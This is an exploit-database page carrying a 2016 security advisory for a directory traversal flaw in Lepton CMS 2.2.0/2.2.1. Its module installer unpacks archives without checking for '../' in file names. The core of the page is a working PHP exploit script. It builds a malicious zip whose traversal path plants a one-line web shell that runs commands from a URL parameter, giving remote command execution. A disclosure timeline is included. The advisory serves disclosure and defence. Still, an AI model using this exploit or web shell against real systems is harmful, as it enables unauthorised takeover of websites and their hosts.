Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Lepton CMS 2.2.0 / 2.2.1 - Directory Traversal

🗓️ 16 Aug 2016 00:00:00Reported by hyp3rlinxType 
zdt
 zdt🔗 0day.today👁 36 Views

Lepton CMS 2.2.0/2.2.1 is vulnerable to directory traversal allowing remote command execution.

Code
[+] Credits: John Page (HYP3RLINX)

 
Vendor:
==================
www.lepton-cms.org
 
 
Product:
=================================
Lepton CMS 2.2.0 / 2.2.1 (update)
 
LEPTON is an easy-to-use but full customizable Content Management System (CMS).
 
 
Vulnerability Type:
============================
Archive Directory Traversal 
 
 
CVE Reference:
==============
N/A
 
 
Vulnerability Details:
=====================
 
Lepton has feature that lets users install new modules, if malicious user uploads an archive and the module is not valid it
will generate an error. However, the malicious archive will still get decompressed and no check is made for ../ characters in
the file name allowing in arbitrary PHP files to be placed outside the intended target directory for installed modules. This can
then be used to execute remote commands on the affected host system. 
 
e.g.
 
We get error message as below.
 
under "Add Ons" tab Install Module.
Invalid LEPTON installation file. Please check the *.zip format.[1]
 
Archive still gets decompressed and the malicious file is moved outside of the intended target directory, by using ../ in file name.
 
 
Exploit code(s):
===============
 
<?php
#Archive Directory Traversal to RCE exploit 
#==============================================
 
if($argc<2){echo "Usage: <filename>";exit();}
$file_name=$argv[1];
 
$zip = new ZipArchive();
$res = $zip->open("$file_name.zip", ZipArchive::CREATE);
$zip->addFromString("..\..\..\..\..\..\..\..\RCE.php", '<?php exec($_GET["cmd"]); ?>');
$zip->close();
 
echo "Malicious archive created...\r\n";
echo "========= hyp3rlinx ============";
?>
 
 
Disclosure Timeline:
===========================================================
Attempted Vendor Notification: June 11, 2016 (No replies)
Vendor Notification on July 12, 2016 ( thanks Henri Salo )
Vendor Acknowledgement: July 13, 2016
Vendor fixes: July 14, 2016
Vendor release version 2.2.2 : August 12, 2016
August 15, 2016  : Public Disclosure

#  0day.today [2018-03-13]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Aug 2016 00:00Current
7.1High risk
Vulners AI Score7.1
lepton cmsdirectory traversalremote command executionmalicious archivesecurity vulnerability
36